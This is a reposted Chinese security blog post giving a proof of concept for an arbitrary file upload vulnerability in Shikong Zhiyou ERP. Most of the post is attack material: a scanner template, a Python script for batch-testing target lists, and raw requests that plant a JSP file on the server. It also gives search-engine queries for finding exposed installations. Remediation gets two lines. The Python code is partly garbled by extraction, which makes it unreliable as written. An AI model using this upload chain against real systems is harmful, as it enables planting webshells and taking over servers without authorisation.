时空智友 ERP uploadstudiofile 文件上传POC

admin
admin
admin
109478
文章
90
评论
2024年7月4日12:56:51评论6 views字数 5190阅读17分18秒阅读模式

 

POC(Yaml&Python)

话不多说先上POC(Yam-poc由yakit或ProjectDiscovery Cloud Platform生成,Python-poc脚本由chatgpt生成,准确性请自测,如您觉得有用,请动动小手点个关注,为您每天更新最新漏洞POC)

  • 「Yaml」
id: ShikongERP-uploadStudioFile-fileupload

info:
name: 时空智友 ERP uploadstudiofile 文件上传
author: god
severity: high
description: 时空智友 ERP uploadstudiofile 文件上传

http:
- raw:
- |
@timeout: 30s
POST /formservice?service=updater.uploadStudioFile HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 613

content=<?xml%20version="1.0"?><root><filename>test.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01%2008:00:00</lmtime></root><!--%3c%25%20%6f%75%74%2e%70%72%69%6e%74%28%22%3c%70%72%65%3e%22%29%3b%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%31%31%31%20%2a%20%31%31%31%29%3b%6f%75%74%2e%70%72%69%6e%74%28%22%3c%2f%70%72%65%3e%22%29%3b%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%53%65%72%76%6c%65%74%50%61%74%68%28%29%29%29%2e%64%65%6c%65%74%65%28%29%3b%0d%0a%25%3e%0d%0a-->

- |+
@timeout: 30s
GET /update/temp/studio/test.jsp HTTP/1.1
Host: {{Hostname}}

max-redirects: 3
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'status_code_2 == 200'
- 'contains(body_2, "12321")'
condition: and

 

时空智友 ERP uploadstudiofile 文件上传POC

时空智友 ERP uploadstudiofile 文件上传POC

  • 「Python」
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import argparse
from urllib3.exceptions import InsecureRequestWarning

RED = '�33[91m'
RESET = '�33[0m'
# 忽略证书验证警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def upload_studio_file(url):
headers = {
'User-Agent''Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15',
'Content-Type''application/x-www-form-urlencoded'
}

data = 'content=<?xml%20version="1.0"?><root><filename>test.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01%2008:00:00</lmtime></root><!--%3c%25%20%6f%75%74%2e%70%72%69%6e%74%28%22%3c%70%72%65%3e%22%29%3b%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%31%31%31%20%2a%20%31%31%31%29%3b%6f%75%74%2e%70%72%69%6e%74%28%22%3c%2f%70%72%65%3e%22%29%3b%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%53%65%72%76%6c%65%74%50%61%74%68%28%29%29%29%2e%64%65%6c%65%74%65%28%29%3b%0d%0a%25%3e%0d%0a-->'

upload_url = f"{url.rstrip('/')}/formservice?service=updater.uploadStudioFile"
shell_url = f"{url.rstrip('/')}/update/temp/studio/test.jsp"

try:
response = requests.post(upload_url, headers=headers, data=data, verify=False, timeout=30)
if response.status_code == 200:
shell_response = requests.get(shell_url, verify=False, timeout=30)
if shell_response.status_code == 200 and "12321" in shell_response.text:
print(f"{RED}URL [{url}] 存在时空智友 ERP uploadstudiofile 文件上传漏洞{RESET}")
else:
print(f"URL [{url}] 可能不存在漏洞")
else:
print(f"URL [{url}] 上传文件失败,响应状态码: {response.status_code}")
except requests.RequestException as e:
print(f"URL [{url}] 请求失败: {e}")

def main():
parser = argparse.ArgumentParser(description='检测目标地址是否存在时空智友 ERP uploadstudiofile 文件上传漏洞')
parser.add_argument('-u''--url', help='指定目标地址')
parser.add_argument('-f''--file', help='指定包含目标地址的文本文件')

args = parser.parse_args()

if args.url:
if not args.url.startswith("http://"and not args.url.startswith("https://"):
args.url = "http://" + args.url
upload_studio_file(args.url)
elif args.file:
with open(args.file, 'r'as file:
urls = file.read().splitlines()
for url in urls:
if not url.startswith("http://"and not url.startswith("https://"):
url = "http://" + url
upload_studio_file(url)

if __name__ == '__main__':
main()

 

时空智友 ERP uploadstudiofile 文件上传POC

漏洞介绍

时空智友ERP总结多年医药行业经验,以企业全面精细化管理方案为核心,融入互联网时代的新兴元素:移动技术、云计算、网络营销,帮助企业从供应商采购、销售、仓储、库房、质量、连锁、零售、会员、促销等各个环节进行综合管理,实现物流、资金流、现金流的有效整合,最终实现卓越的业务管理。其uploadStudioFile接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件到服务器上,包括木马后门文件,导从而获取服务器权限。

时空智友 ERP uploadstudiofile 文件上传POC

资产测绘

  • 「Fofa」

body="login.jsp?login=null"

  • 「Hunter」

web.body="login.jsp?login=null"

  • 「Quake」

body="login.jsp?login=null"

时空智友 ERP uploadstudiofile 文件上传POC

漏洞复现

「1、构造数据包」

POST /formservice?service=updater.uploadStudioFile HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 609

content=<?xml%20version="1.0"?><root><filename>test.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01%2008:00:00</lmtime></root><!--%3c%25%20%6f%75%74%2e%70%72%69%6e%74%28%22%3c%70%72%65%3e%22%29%3b%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%31%31%31%20%2a%20%31%31%31%29%3b%6f%75%74%2e%70%72%69%6e%74%28%22%3c%2f%70%72%65%3e%22%29%3b%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%53%65%72%76%6c%65%74%50%61%74%68%28%29%29%29%2e%64%65%6c%65%74%65%28%29%3b%0d%0a%25%3e%0d%0a-->

时空智友 ERP uploadstudiofile 文件上传POC

「2、查看上传文件」

GET /update/temp/studio/test.jsp HTTP/1.1
Host: ip

时空智友 ERP uploadstudiofile 文件上传POC

修复方案

  • 官方已发布安全补丁,建议联系厂商打补丁或升级版本。
  • 引入Web应用防火墙防护,配置接口拦截策略。

 

原文始发于微信公众号(浅梦安全):【漏洞复现|含POC】时空智友 ERP uploadstudiofile 文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月4日12:56:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   时空智友 ERP uploadstudiofile 文件上传POChttp://cn-sec.com/archives/2917036.html

发表评论

匿名网友 填写信息